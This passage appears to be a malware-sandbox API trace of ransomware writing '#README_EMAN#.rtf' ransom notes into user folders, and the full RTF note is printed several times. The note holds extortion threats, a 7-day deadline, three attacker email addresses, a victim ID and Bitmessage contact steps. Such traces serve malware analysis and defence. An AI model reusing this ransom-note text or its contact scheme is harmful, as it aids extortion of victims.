n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.553] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.554] CloseHandle (hObject=0x2c8) returned 1 [0278.554] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\#readme_eman#.rtf")) returned 0xffffffff [0278.554] GetLastError () returned 0x2 [0278.554] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.555] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 